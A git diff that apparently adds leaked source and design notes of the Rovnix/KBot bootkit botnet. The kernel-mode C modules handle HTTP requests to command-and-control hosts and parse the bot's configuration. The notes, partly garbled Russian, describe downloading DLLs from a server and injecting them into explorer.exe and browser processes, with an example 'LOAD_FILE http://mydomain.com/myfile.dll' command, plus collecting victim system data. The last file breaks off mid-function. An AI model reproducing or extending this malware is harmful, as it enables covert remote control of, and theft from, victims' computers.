diff --git a/Rovnix/_DUMP/0189830fee0864366db1b5605c466a4e5b055992.svn-base b/Rovnix/_DUMP/0189830fee0864366db1b5605c466a4e5b055992.svn-base new file mode 100644 index 000000000..41d4437d3 --- /dev/null +++ b/Rovnix/_DUMP/0189830fee0864366db1b5605c466a4e5b055992.svn-base 
@@ -0,0 +1,160 @@ +1) Format Config. Boat because we have transformed into a server on the pitch. So +Communication server only with the bot comes in a format that you are asking. For debugging +we are well able to look like the contents of the config, but better +optimize its safety and for your convenience. + +2) other matters at its discretion. All that would be reflected in the TOR. +Let's first make a base on it and then we'll cheat. Now we go into the +yuzeragentov discuss what is necessary to put a bot server masterbota yet. GET +POST, or let him decide cheater. + +Boat : able to receive files from the server to write to the vfs and run , can delete files +of vfs, can return the content vfs ( tell the server what dll successfully +loading ) , has a unique Haydee , who can transfer dll ( eg +through file 1726353.bid (bot id) which is at the vfs), is able to list +server at specified intervals to receive instructions , can initiate inject +dll ( located in the vfs) in the process . + +Server: receives from the bot information recorded in the database, receives MasterBota +instructions for bots (in fact, for each boat has its own guide , maybe the database is updated +and update the database at a particular bot which the file can be removed and which is +added ) returns MasterBotu dump the database for analysis and a sid (server id). Incidentally, +The database can be stored on the vfs ( work with) and simply transfer it MasterBotu and +MasterBota received from new over the old one to overwrite . It is only necessary for the database +provide versioning . + +MasterBot communicates with the server, gets the current database, instructs +(Actually updates the database) for bots, transfers dll, which is in the database. + +MasterBot received from the database server lays out in its local folder. C: \ brownie_db \ +To provide masterbota start with parameters: ip server, the path to the database, which +it is necessary to fill in the destination ip. 
Run masterbot with the parameters he knocks on the ip, +poluchetsya database from the server transmits its disabled. + +We said that the communication server and encrypted bot. When you create a bot and server +masterbota need them to sign the certificate. Bot did not listen to someone else's server, +the server has not received instructions from someone else masterbota. As this moment to protect? + +The database contains: Haydee bot contents vfs, date of last otstuk . +I think for each server to determine the maximum number of serviced bots , +Nk example , if the server banging bot is not in the list of Nk , the server +will block the connection. What For? 1 ) we manage stress , 2 ) to transfer the database masterbotu +where a limited number of records is always faster . 3 ) MasterBot itself will be removed from the database +old boots . + +If there is a free cheater , then we can make a small dll to collect information about the target +system. In order not to sew it into the loader . + +What will be able to: + +- When creating sutured it to the list of URLs ostuka +- Ticking off at the start and every N hours (specified in the configuration ) +- Returns a list of installed software +- Returns the configuration PC +- Returns the user name +- Returns the system language +- Returns the time zone +- Drawn to the url, it requests a file path , which must be returned . +- Drawn to the url, queries mask , returns a list of files to appropriate mask. + + +> insufficient documentation for use + +> currently not clear (bk): +> 1 . how to attach to and run arbitrary instaleru dll ? documentation +> Kldr32.cfg - configuration file to attach to the DLL , 32- bit +> driver. +> Kldr64.cfg - configuration file for attachment DLL to a 64 -bit +> driver. +> Demo32.dll - 32- bit demo library . +> Demo64.dll - the 64 -bit demo library . + +> project data files are missing , are mentioned only in the readme.txt. 
+> maybe something was not added to the Suggested version +This outdated information . The project is using kernelnogo bot implies that + Any DLL will be loaded from a bot network. Poet configuration files to build the installer does not + provide information to attach to the DLL driver. +Let us know if this functionality is required, - make appropriate configs . + +> 2 . not describes how the distribution config , the assembly is set +> kbot.ini, how to upgrade in the future? + Config file for a specific bot ( or group of bots ) is given by a team of SET_CONFIG MB. + Boat requests configuration timer (parameter ConfigPeriod in KBOT.INI). + This is the same INI file , it is stored in the bots VFS and used in the future. + Example KBOT.INI folder \ BkBuild. + +> what is written in the dock is encrypted , and how a signature , but what format +> Data and how to attach signature? + Sign the file can be a utility CT (BSRV \ CT), or if the secret key is attached to the MB32 ( 64 ) .EXE is + signed file automatically when loading it to the server ( and the team SET_TASK SET_CONFIG). + +> the same with the teams , it is not clear how to shape the text file +> sign it , + A text file is generated with any text editor . Encoding - ANSI. Signed by the utility CT: +CT -s < secret key > < source file > < output file > + or, if the private key is attached to the MB32 ( 64 ) .EXE is + signed file automatically when loading it to the server ( and the team SET_TASK SET_CONFIG). + +> Is it possible to download multiple files simultaneously? if so, what +> Format command ? + No , SET_TASK SET_CONFIG and charged with one file or a group of bots bot . + The command file can be several teams, each must begin on a new line . + +> may not be assumed without masterbota operation , but this is still +> I write below . + +> 3.KBOT: function SET_INJECT < file name on the VFS> < list of processes > +> it is not clear that inject , dll, exe? < list of processes > comma ? 
+ +an example of the file: +LOAD_FILE http://mydomain.com/myfile.dll my.dll; http://mydomain.com/myfile.dll loads and stores +; under the name my.dll +SET_INJECT my.dll explorer.exe iexplore.exe; asks to inject MY.DLL in the process explorer.exe and iexplore.exe + + +> server (SRV) +> 1 . It does not describe the format of data storage server . +> records: +> BASE < path to file> - downloads from the current database server and clients +> sohrayaet it to the specified file . +> it is not clear that this is stored in the database + The user ID , the time the record was created , last otstuk , IP and User-Agent record was created , + IP and User-Agent last otstuk , ID group , the current configuration file ( name , CRC32, installation date ) + the current command file ( name , CRC32, installation date ) . +Now the database is stored in an internal format of the server. Tool to Convert give with the first update. + +> 2.SET_CONFIG (SET_TASK) < name of the file on the server > [ limit ] +> MB.exe sign all by herself or her hands each time will have to be attached +> Certificates ? unfortunately I am not able to gather and see this +> utility . + +Sign itself if the utility was attached a secret key. This is done by running the bat- nick + bkbuild \ bkbuild.bat. + +> are lacking in examples of the commands. if there is one car that +> like everything is clear , if there are 10 , it is necessary to join and give each +> command through the console ? +Yes. If you have multiple servers , you need the trailer to each in turn. +How to do better? + +> 3 . in paragraph 2 for BK mentioned the work without a master bot. +> I understand that after loading the boat progruzhat server.dll and how that +> start, it contains a configuration for the initial work , then this +> vehicle becomes both client and server. +> client side allows the server to upgrade and update the configuration +> server . and the server , in turn, provides access to other currently +> servers. 
+ That's right . You can specify inject server.dll in any system process , such as services.exe. + +> in the case of data transfer to downstream MB are also stored in the non- +> signed the form , just as files vfs ( config or something else ) +> How is it supposed to be used ? Install on " their " server ? +Here I would like to read more . I did not understand the question. + +> to understand how he must have a complete set of certificates for +> to distribute config files , +> download at " another " car will be safe ? " +Assuming that the file or subscribes to the local computer operator , or, + uploaded to the server utility MB.EXE, which contains the secret key again, with + local computer operator . + Under this scheme seketny key only on the computer operator . diff --git a/Rovnix/_DUMP/08a5fa2d9015f0c83e14bd598d20220736ad8c96.svn-base b/Rovnix/_DUMP/08a5fa2d9015f0c83e14bd598d20220736ad8c96.svn-base new file mode 100644 index 000000000..0570bc464 --- /dev/null +++ b/Rovnix/_DUMP/08a5fa2d9015f0c83e14bd598d20220736ad8c96.svn-base 
@@ -0,0 +1,121 @@ +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +// KBot project. +// +// module: sendrecv.c +// $Revision: 29 $ +// $Date: 2012-05-30 11:47:28 +0400 (Ср, 30 май 2012) $ +// description: +// Kernel-mode client program. +// Send and receive data functions. + +#include +#include +#include +#define NTSTRSAFE_NO_DEPRECATE +#include + +#include "version.h" +#include "ntddkex.h" +#include "kdbg.h" + +#include "inaddr.h" +#include "kipapi.h" +#include "..\khttp\khttp.h" + +#include "..\kiplib\kstream.h" + +#include "kbot.h" +#include "kbotinc.h" + +NTSTATUS KBotRequest( + IN PCHAR Host, + IN PCHAR Uri, + IN PCHAR Method, + OUT PCHAR* pBuffer, + OUT PULONG pSize + ) +{ + NTSTATUS ntStatus = STATUS_INSUFFICIENT_RESOURCES; + HANDLE hSession = 0, hConnect = 0, hRequest = 0; + PKSTREAM pStream = NULL; + PCHAR Buffer = NULL; + + KdPrint(("KBOT: request \"%s %s%s\"\n", Method, Host, Uri)); + + do // not a loop + { + ULONG Status = 0, sLen = sizeof(ULONG), Total = 0; + BOOL Ret; + + if (!(Buffer = KBotAlloc(KBOT_CONTENT_BUFFER_SIZE))) + break; + + if (!(pStream = KStreamAllocate())) + break; + + if (!(hSession = KHttpOpen(g_KbotUserAgent, 0, NULL, NULL, 0))) + break; + + if (!(hConnect = KHttpConnect(hSession, Host, KHTTP_DEFAULT_HTTP_PORT, 0))) + { + ntStatus = STATUS_CONNECTION_REFUSED; + break; + } + + ntStatus = STATUS_REQUEST_NOT_ACCEPTED; + + if (!(hRequest = KHttpOpenRequest(hConnect, Method, Uri, NULL, NULL, NULL, 0))) + break; + + if (!(Ret = KHttpSendRequest(hRequest, NULL, 0, NULL, 0, 0, 0))) + break; + + if (!(Ret = KHttpReceiveResponse(hRequest, NULL))) + break; + + if (!KHttpQueryHeaders(hRequest, KHTTP_QUERY_STATUS_CODE, NULL, &Status, &sLen, NULL)) + break; + + if (Status != KHTTP_STATUS_OK) + break; + + while(KHttpReadData(hRequest, Buffer, KBOT_CONTENT_BUFFER_SIZE, &sLen) && sLen != 0) + { + KStreamWrite(pStream, Buffer, sLen); + Total += sLen; + } + + KBotFree(Buffer); + + 
if (sLen = KStreamGetLength(pStream)) + { + if (!(Buffer = KBotAlloc(sLen + 1))) + break; + + KStreamRead(pStream, Buffer, sLen); + Buffer[sLen] = 0; + + *pBuffer = Buffer; + } // if (sLen = KStreamGetLength(pStream)) + + *pSize = sLen; + ntStatus = STATUS_SUCCESS; + + } while(FALSE); + + if (hRequest) + KHttpCloseHandle(hRequest); + if (hConnect) + KHttpCloseHandle(hConnect); + if (hSession) + KHttpCloseHandle(hSession); + if (pStream) + KStreamRelease(pStream); + + if (!NT_SUCCESS(ntStatus)) + KBotFree(Buffer); + + KdPrint(("KBOT: request ended with status 0x%x\n", ntStatus)); + + return(ntStatus); +} diff --git a/Rovnix/_DUMP/1f33854ad0472d1cab56b394a5d99ce056469b6d.svn-base b/Rovnix/_DUMP/1f33854ad0472d1cab56b394a5d99ce056469b6d.svn-base new file mode 100644 index 000000000..223172a99 --- /dev/null +++ b/Rovnix/_DUMP/1f33854ad0472d1cab56b394a5d99ce056469b6d.svn-base 
@@ -0,0 +1,444 @@ +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +// KBot project. +// +// module: config.c +// $Revision: 34 $ +// $Date: 2012-08-23 15:11:38 +0400 (Чт, 23 авг 2012) $ +// description: +// Config file processing engine. + +#include +#include +#include +#define NTSTRSAFE_NO_DEPRECATE +#include + +#include "version.h" +#include "ntddkex.h" +#include "kdbg.h" +#include "joiner.h" +#include "bklib.h" + +#include "..\crypto\crypto.h" +#include "..\fslib\fslib.h" +#include "..\bkdrv\bkdrv.h" + +#include "kbot.h" +#include "kbotinc.h" + +#define _TCHAR CHAR + + +typedef struct _REQUEST_PARAMETER +{ + ULONG NameHash; + ULONG Flags; + PCHAR pValue; +} REQUEST_PARAMETER, *PREQUEST_PARAMETER; + +typedef struct _REQUEST_PARAMETERS +{ + ULONG Count; + REQUEST_PARAMETER Parameter[]; +} REQUEST_PARAMETERS, *PREQUEST_PARAMETERS; + + + +PKBOT_CONFIG volatile g_KBotConfig = NULL; +KBOT_USER g_KBotUserId = {0}; +// +// Allocates a memory buffer and duplicates the specified source string into it. +// +static LPTSTR DupString( + LPTSTR SourceStr, + ULONG MinimumLength + ) +{ + LPTSTR DestStr; + ULONG Size = max((strlen(SourceStr) + 1) * sizeof(_TCHAR), MinimumLength * sizeof(_TCHAR)); + if (DestStr = KBotAlloc(Size)) + { + RtlZeroMemory(DestStr, Size); + strcpy(DestStr, SourceStr); + } + + return(DestStr); +} + + +// +// Parses the specified buffer containg lines of parameter strings like: +// NAME = VALUE +// Allocates and fills REQUEST_PARAMETERS structure with name hashes and parameter values. 
+// +NTSTATUS ParseParamFile( + PCHAR ParamStr, // buffer containg lines of parameter strings + PREQUEST_PARAMETERS* ppParameters, // variable to return pointer to REQUEST_PARAMETERS structure + BOOL bCaseSensitive // specifies how to parse parameter names and values: case sensitive or not + ) +{ + NTSTATUS ntStatus = STATUS_SUCCESS; + PCHAR pStr, cStr = ParamStr; + ULONG Count = 0; + PREQUEST_PARAMETERS pParams; + + // Calculating maximum number of parameters in the file + while(cStr = strchr(cStr, '=')) + { + Count += 1; + cStr += 1; + } + + if (Count) + { + // Allocating REQUEST_PARAMETER structure + if (pParams = KBotAlloc(sizeof(REQUEST_PARAMETERS) + Count * sizeof(REQUEST_PARAMETER))) + { + PREQUEST_PARAMETER pParam = (PREQUEST_PARAMETER)&pParams->Parameter; + pParams->Count = 0; + + do + { + if ((pStr = strchr(ParamStr, '\r')) || (pStr = strchr(ParamStr, '\n'))) + { + *pStr = 0; + pStr += 1; + } + + if (cStr = strchr(ParamStr, ';')) + *cStr = 0; + + if (cStr = strchr(ParamStr, '=')) + { + if (!bCaseSensitive) + { + ANSI_STRING As; + // Converting to upper case + RtlInitAnsiString(&As, ParamStr); + RtlUpperString(&As, &As); + } + + *cStr = 0; + cStr += 1; + + strtrim(ParamStr, " \t\r\n"); + strtrim(cStr, " \t"); + + if (*ParamStr) + { + pParam->NameHash = BkCRC32(ParamStr, strlen(ParamStr)); + pParam->pValue = cStr; + pParams->Count += 1; + pParam += 1; + } + } // if (cStr = StrChr(ParamStr, '=')) + } while(ParamStr = pStr); + + *ppParameters = pParams; + ASSERT(ntStatus == STATUS_SUCCESS); + + } // if (pParams = hAlloc(sizeof(REQUEST_PARAMETERS) + Count * sizeof(REQUEST_PARAMETER))) + else + ntStatus = STATUS_INSUFFICIENT_RESOURCES; + } // if (Count) + else + ntStatus = STATUS_INVALID_PARAMETER; + + return(ntStatus); +} + + +// +// Scans the specified REQUEST_PARAMETERS structure for a parameter with the specified Name hash. +// Returns pointer to the value of the parameter or NULL if the parameter not found. 
+// +PCHAR GetParamValue( + ULONG NameHash, + PREQUEST_PARAMETERS pParameters + ) +{ + PCHAR pValue = NULL; + ULONG i; + + if (pParameters) + { + for (i=0; iCount; i++) + { + if (pParameters->Parameter[i].NameHash == NameHash) + { + pValue = pParameters->Parameter[i].pValue; + break; + } + } // for (i=0; iCount; i++) + } // if (pParameters) + + return(pValue); +} + +// +// Parses the specified pHostList string into multiple strings devided by ','. +// Allocates and fills a pHostArray array with pointers to those strings. +// +NTSTATUS BuildHostArray( + PCHAR pHostList, + PCHAR** pHostArray, + PULONG pNumberHosts + ) +{ + NTSTATUS ntStatus = STATUS_SUCCESS; + PCHAR cStr = pHostList; + ULONG Count = 1; + PCHAR* HostArray; + + // Calculating maximum number of hosts in the list + while(cStr = strchr(cStr, ',')) + { + Count += 1; + cStr += 1; + } + + if (HostArray = (PCHAR*)KBotAlloc(Count * sizeof(PCHAR))) + { + Count = 0; + do + { + HostArray[Count] = pHostList; + if (pHostList = strchr(pHostList, ',')) + { + *pHostList = 0; + pHostList += 1; + } + strtrim(HostArray[Count], " \t"); + Count += 1; + } while(pHostList); + + *pHostArray = HostArray; + *pNumberHosts = Count; + + } // if (HostArray = KBotAlloc(Count * sizeof(PCHAR))) + else + ntStatus = STATUS_INSUFFICIENT_RESOURCES; + + return(ntStatus); +} + + +// +// Releases the specified configuration structure. +// Cleans up parameters, frees memory. +// +VOID KBotReleaseConfig( + PKBOT_CONFIG Config + ) +{ + ASSERT_KBOT_CONFIG(Config); + if (Config->HostArray) + KBotFree(Config->HostArray); + if (Config->pHostList) + KBotFree(Config->pHostList); + if (Config->pKey) + KBotFree(Config->pKey); +#if DBG + Config->Magic = 0; +#endif + KBotFree(Config); +} + + +// +// Initializes KBOT global configuration structure with the specified parameters. 
+// +static NTSTATUS KBotInitConfig( + PREQUEST_PARAMETERS pIniParams, + ULONG ConfigCRC // CRC32 hash of the config file + ) +{ + NTSTATUS ntStatus = STATUS_INSUFFICIENT_RESOURCES; + PKBOT_CONFIG Config; + PCHAR pHostList, pValue; + ULONG uValue; + + do // not a loop + { + // Creating new configuration structure + if (!(Config = MyAllocatePool(PagedPool, sizeof(KBOT_CONFIG)))) + { + ASSERT(ntStatus == STATUS_INSUFFICIENT_RESOURCES); + break; + } + RtlZeroMemory(Config, sizeof(KBOT_CONFIG)); + +#if DBG + Config->Magic = KBOT_CONFIG_MAGIC; +#endif + Config->ConfigCRC = ConfigCRC; + + // Processing configuration file parameters: + // RC6-key used for obfuscating requests + if (!(pValue = GetParamValue(CRC_KEY, pIniParams))) + pValue = SERVER_DEFAULT_KEY; + + if (!(Config->pKey = DupString(pValue, sizeof(RC6_KEY)))) + { + ASSERT(ntStatus == STATUS_INSUFFICIENT_RESOURCES); + break; + } + + // active host list + if ((pValue = GetParamValue(CRC_HOSTS, pIniParams)) && *(strtrim(pValue, " \t")) != 0 && (pValue = DupString(pValue, 0))) + Config->pHostList = pValue; + else + pValue = DupString(KBOT_DEFAULT_HOST_LIST, 0); + + if (!(NT_SUCCESS(ntStatus = BuildHostArray(pValue, &Config->HostArray, &Config->HostCount)))) + break; + Config->HostIndex = 0; + + // group ID + if ((pValue = GetParamValue(CRC_GROUP, pIniParams)) && (uValue = strtol(pValue, NULL, 0))) + Config->GroupId = uValue; + else + Config->GroupId = KBOT_DEFAULT_GROUP_ID; + + // config update period + if ((pValue = GetParamValue(CRC_CONFIG_PERIOD, pIniParams)) && (uValue = strtol(pValue, NULL, 0))) + Config->ConfigPeriod = uValue; + else + Config->ConfigPeriod = KBOT_DEFAULT_CONFIG_PERIOD; + + // task update period + if ((pValue = GetParamValue(CRC_TASK_PERIOD, pIniParams)) && (uValue = strtol(pValue, NULL, 0))) + Config->TaskPeriod = uValue; + else + Config->TaskPeriod = KBOT_DEFAULT_TASK_PERIOD; + + Config->MinimumPeriod = KBOT_MINIMUM_REQUEST_PERIOD; + + KdPrint(("KBOT: global configuration data 
initialized\n")); + + ntStatus = STATUS_SUCCESS; + } while(FALSE); + + if (NT_SUCCESS(ntStatus)) + { + if (Config = InterlockedExchangePointer(&g_KBotConfig, Config)) + KBotReleaseConfig(Config); + } + else + { + if (Config) + KBotReleaseConfig(Config); + } + + return(ntStatus); +} + +// +// Loads the specified file, decrypts it and verifies its' digital signature. +// +NTSTATUS LoadUnsignFile( + PANSI_STRING FileName, // VFS-based file name + PCHAR* pFileData, // variable that receives a buffer with decrypted file data + PULONG pFileSize, // variable that receives the size of the buffer + PULONG pFileCRC // variable that receives original file CRC + ) +{ + NTSTATUS ntStatus; + PCHAR pFile, uFile; + ULONG Size, uSize; + + if (NT_SUCCESS(ntStatus = FsLoadFile(FileName, (PCHAR*)&pFile, &Size)) && Size) + { + *pFileCRC = BkCRC32(pFile, Size); + + KdPrint(("KBOT: config 0x%X loaded from a file\n", *pFileCRC)); + +#ifdef _USE_DIGITAL_SIGNATURE + if (!g_KbotPublicKey || !(uSize = DsUnsign(pFile, Size, &uFile, g_KbotPublicKey))) + { + ntStatus = STATUS_SYSTEM_IMAGE_BAD_SIGNATURE; + KdPrint(("KBOT: config file verification failed\n")); + } + else + { + *pFileData = uFile; + *pFileSize = uSize; + ASSERT(ntStatus == STATUS_SUCCESS); + KdPrint(("KBOT: config file successfully verified\n")); + } + + MyFreePool(pFile); +#else + *pFileData = pFile; + *pFileSize = Size; + ASSERT(ntStatus == STATUS_SUCCESS); +#endif + } // if (NT_SUCCESS(ntStatus = FsLoadFile(FileName, (PCHAR*)&pFile, &Size))) + + return(ntStatus); +} + +// +// Tries to loads KBOT configuration file from the VFS root directory and from the current driver module. +// Initializes global configuration structure. 
+// +NTSTATUS KBotLoadConfig(VOID) +{ + NTSTATUS ntStatus; + PCHAR pConfigFile = NULL; + ULONG ConfigSize, ConfigCRC = 0; + ANSI_STRING aConfigName = RTL_CONSTANT_STRING(szKBotConfigFileName); + PREQUEST_PARAMETERS pIniParams = NULL; + + // Looking for a configuration file within the VFS root directory + if (NT_SUCCESS(LoadUnsignFile(&aConfigName, (PCHAR*)&pConfigFile, &ConfigSize, &ConfigCRC)) || + // Trying to load the configuration file attached to the driver + GetJoinedData((PIMAGE_DOS_HEADER)BkImageBase, &pConfigFile, &ConfigSize, FALSE, CRC_KBOT_INI, 0)) + { + // There is the configuration file, parsing it... + ASSERT(pConfigFile[ConfigSize] == 0); + ParseParamFile(pConfigFile, &pIniParams, FALSE); + } // if (NT_SUCCESS(FsLoadFile(&aConfigName, (PCHAR*)&Config, &Size)) || + else + { + KdPrint(("KBOT: file \"%s\" not found. Using defaults\n", szKBotConfigFileName)); + } + + ntStatus = KBotInitConfig(pIniParams, ConfigCRC); + + if (pIniParams) + KBotFree(pIniParams); + if (pConfigFile) + MyFreePool(pConfigFile); + + return(ntStatus); +} + + +VOID KBotGetUserId(VOID) +{ + PCHAR pUserIdFile; + ULONG UserIdSize; + + ANSI_STRING aUserIdName = RTL_CONSTANT_STRING(szKBotUserIdFileName); + + // Looking for the user ID file stored within the VFS root directory + if (NT_SUCCESS(FsLoadFile(&aUserIdName, (PCHAR*)&pUserIdFile, &UserIdSize)) && UserIdSize == sizeof(KBOT_USER)) + { + // User ID file found and loaded + memcpy(&g_KBotUserId, pUserIdFile, UserIdSize); + MyFreePool(pUserIdFile); + KdPrint(("KBOT: user ID loaded from a file\n")); + } + else + { + // No user ID file found + LARGE_INTEGER Ticks; + KeQueryTickCount(&Ticks); + + BkGuidFromSeed(&g_KBotUserId.Id, &Ticks.LowPart); + FsSaveFile(&aUserIdName, (PCHAR)&g_KBotUserId.Id, sizeof(KBOT_USER)); + + KdPrint(("KBOT: new user ID created\n")); + } +} 
diff --git a/Rovnix/_DUMP/38eba669e7f65f690d0f9636c1d450223f382b55.svn-base b/Rovnix/_DUMP/38eba669e7f65f690d0f9636c1d450223f382b55.svn-base new file mode 100644 index 000000000..b291e4f0e --- /dev/null +++ b/Rovnix/_DUMP/38eba669e7f65f690d0f9636c1d450223f382b55.svn-base @@ -0,0 +1,27 @@ +; Êîíôèãóðàöèîííûé ôàéë äëÿ óòèëèòû FJ +; Îïèñûâàåò äðàéâåðà, êîòîðûå íåîáõîäèìî ïðèêðåïèòü ê èíñòàëëåðó +; Ïðè çàïóñêå èíñòàëëåð îïðåäåëÿåò ðàçðÿäíîñòü ÎÑ è óñòàíàâëèâàåò ñîîòâåòñòâóþùèé äðàéâåð + + +; Íà÷àëüíûé çàãðóç÷èê +BIN: Release\vbr.com + + +; Äðàéâåð äëÿ 32õ-áèòíîé ÎÑ +DRV: ..\bin\Release\i386\kloader.sys + +; Îòêðûòûé RSA-êëþ÷ äëÿ ïðîâåðêè ïîäïèñè ôàéëîâ +BIN: public.key + +; Êîíôèãóðàöèîííûé ôàéë ìîäóëÿ KBOT +BIN: kbot.ini + + +; Äðàéâåð äëÿ 64õ-áèòíîé ÎÑ +DRV: ..\bin\release\amd64\kloader.sys + +; Îòêðûòûé RSA-êëþ÷ äëÿ ïðîâåðêè ïîäïèñè ôàéëîâ +BIN: public.key + +; Êîíôèãóðàöèîííûé ôàéë ìîäóëÿ KBOT +BIN: kbot.ini diff --git a/Rovnix/_DUMP/7aa3977f419f2d8cd8e28c20a6e9e483f2482598.svn-base b/Rovnix/_DUMP/7aa3977f419f2d8cd8e28c20a6e9e483f2482598.svn-base new file mode 100644 index 000000000..d8481b968 --- /dev/null +++ b/Rovnix/_DUMP/7aa3977f419f2d8cd8e28c20a6e9e483f2482598.svn-base 
@@ -0,0 +1,45 @@ +Êåðíåëüíûé áîò + + äàííûé ìîìåíò ðåàëèçîâàí ñëåäóþùèé ôóíêöèîíàë: +Áîò ïðåäñòàâëÿåò ñîáîé äðàéâåð, çàãðóæàåìûé ïîñðåäñòâîì áóòêèò-ëîàäåðà. Äðàéâåð ñîäåðæèò ñâîé TCP\IP ñòåê è + ðåàëèçàöèþ HTTP. Ïîñëå èíèöèàëèçàöèè áîò ñîçäàåò òàéìåð, ïî êîòîðîìó îáðàùàåòñÿ (ïîñðåäñòâîì HTTP) íà + çàäàííûé URL, óêàçûâàþùèé íà PHP ñêðèïò, êîòîðûé âîçâðàùàåò êîíôèã-ôàéë.  êîíôèãå ñîäåðæàòñÿ êîìàíäû òèïà: + "DLL: http://myhost.com/myfile.dll, file1.dll, explorer.exe iexplore.exe firefox.exe" + Áîò ñêà÷èâàåò (÷åðåç HTTP) ôàéë myhost.com/myfile.dll, ñîõðàíÿåò åãî íà VFS êàê file1.dll, è ðåãèñòðèðóåò + file1.dll äëÿ àâòîìàòè÷åñêîãî èíæåêòà â ïðîöåññû: explorer.exe, iexplore.exe, firefox.exe. + +×òî íåîáõîäèìî äëÿ äàëüíåéøåé ðàçðàáîòêè: + +1. Ñîãëàñîâàòü ôîðìàò êîíôèã-ôàéëà +Ñåé÷àñ èñïîëüçóåòñÿ îáû÷íûé òåêñòîâûé ôàéë, îïèñàííûé âûøå. +Âîçìîæíî, åñòü ñìûñë äîáàâèòü â êîíôèã-ôàéë òàêèå ïàðàìåòðû êàê: ñïèñîê ñåðâåðîâ äëÿ ïîëó÷åíèÿ êîíôèãà, ñòðîêà + (ñêðèïò è ïàðàìåòðû) äëÿ îáðàùåíèÿ çà êîíôèãîì, ïåðèîä îáðàùåíèÿ çà êîíôèãîì. ×òî-òî åùå? +Âîçìîæíî, ñòîèò èñïîëüçîâàòü êîíâåðòîð (êîíôèãóðàòîð) äëÿ ïðåîáðàçîâàíèÿ òåêñòîâîãî êîíôèã-ôàéëà â + îïðåäåëåííûé ôîðìàò, ñ öåëüþ óáðàòü ïàðñåð òåêñòà èç áîòà, ÷òî óìåíüøèò åãî ðàçìåð è ñíèçèò âåðîÿòíîñòü + îøèáîê. +Ôîðìàò êîìàíä: Êîìàíäû äëÿ äîáàâëåíèÿ DLL íà çàãðóçêó, äëÿ óäàëåíèÿ DLL, äëÿ îáíîâëåíèÿ è òï. Êîìàíäû äëÿ + ðàáîòû ñ äðàéâåðàìè? + +2. Ñîãëàñîâàòü ôîðìàò çàïðîñà êîíôèãà +Ñåé÷àñ áîò ðàáîòàåò ñ íàøèì òåñòîâûì ñåðâåðîì, ôîðìàò çàïðîñà ñëåäóþùèé: +GET /config.php?version=100&user=1234&server=1&id=1000&crc=3201b37f +ãäå: version - âåðñèÿ áîòà, user - óíèêàëüíûé ID êëèåíòà, server - ID ñåðâåðà, id - ãðóïïà áîòà, crc - CRC32 + ïðåäûäóùåãî êîíôèãà (èñïîëüçóåòñÿ äëÿ òîãî, ÷òîáû íå âûäàâàòü îäèí êîíôèã ïîâòîðíî) + +÷òî íóæíî èçìåíèòü: +- òèï çàïðîñà: GET èëè POST ? +- èìÿ ñêðèïòà, âîçâðàùàþùåãî êîíôèã +- ïàðàìåòðû ñêðèïòà: ID êëèåíòà, Âåðñèÿ áîòà, ID ñåðâåðà, CRC32 ïðåäûäóùåãî êîíôèãà, ÷òî-òî åùå? +- äîï. 
ïàðàìåòðû HTTP çàïðîñà: âåðñèÿ è àðõèòåêòóðà ÎÑ (User-Agent), Referer, ÷òî-òî åùå? +- ? + +3. ×òî-òî åùå, ÷òî ÿ íå ó÷åë? + + +Åñëè ó çàêàç÷èêà óæå åñòü ðàáîòàþùèé ñåðâåð ñ àäìèíêîé, ïîçâîëÿþùèé âûäàâàòü êîíôèãè, òî ïðîøó ïðåäîñòàâèòü +- îïèñàíèå ôîðìàòà êîíôèãà +- îïèñàíèå ïðòîêîëà âçàèìîäåéñòâèÿ +òàêæå, ïðîøó äàòü âðåìåííûé äîñòóï ê ñåðâåðó, äëÿ äîðàáîòêè áîòà ïîä ïðîòîêîëû çàêàç÷èêà, è ïîñëåäóþùåãî + òåñòèðîâàíèÿ. + + diff --git a/Rovnix/_DUMP/a00c81cdc72e6720ecb82349ae1166614853e05c.svn-base b/Rovnix/_DUMP/a00c81cdc72e6720ecb82349ae1166614853e05c.svn-base new file mode 100644 index 000000000..a64579f03 --- /dev/null +++ b/Rovnix/_DUMP/a00c81cdc72e6720ecb82349ae1166614853e05c.svn-base 
@@ -0,0 +1,371 @@ +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +// KBot project. +// +// module: kbot.c +// $Revision: 32 $ +// $Date: 2012-07-04 15:11:26 +0400 (Ср, 04 июл 2012) $ +// description: +// Kernel-mode client program. +// Connects over the KIP to one of the specified C&C servers and receives specially formed configuration files and commands. + +#include +#include +#include +#define NTSTRSAFE_NO_DEPRECATE +#include + +#include "version.h" +#include "ntddkex.h" +#include "kdbg.h" +#include "bklib.h" + +#include "..\bkdrv\bkdrv.h" +#include "..\bklib\fssup.h" +#include "..\fslib\vfat.h" +#include "..\fslib\fslib.h" + +#include "inaddr.h" +#include "..\inc\kipapi.h" +#include "..\khttp\khttp.h" + +#include "..\kiplib\kstream.h" +#include "..\crypto\crypto.h" + +#include "joiner.h" +#include "kbot.h" +#include "kbotinc.h" + +KEVENT g_KBotShutdownEvent = {0}; +PCHAR g_KbotPublicKey = NULL; +PCHAR g_KbotUserAgent = NULL; + +PVOID KBotAlloc(ULONG Size) +{ + return(MyAllocatePool(PagedPool, Size)); +} + +VOID KBotFree(PVOID Mem) +{ + MyFreePool(Mem); +} + +// ---- Following routines are used by CRYPTO library --------------------------------------------------------------------- + +ULONG __stdcall AppRand(VOID) +{ + LARGE_INTEGER TickCount; + KeQueryTickCount(&TickCount); + return(TickCount.LowPart); +} +// -------------------------------------------------------------------------------------------------------------------------- + + + +ULONG KBotSelectHost(ULONG OldIndex) +{ + if (OldIndex == g_KBotConfig->HostIndex) + { + g_KBotConfig->HostIndex += 1; + if (g_KBotConfig->HostIndex == g_KBotConfig->HostCount) + g_KBotConfig->HostIndex = 0; + } + return(g_KBotConfig->HostIndex); +} + +NTSTATUS KBotCommonRequest( + PCHAR ScriptUri, // Target script name template + PCHAR Method, // HTTP Method + PCHAR* pBuffer, // Pointer to a variable that receives pointer to a buffer with data + PULONG 
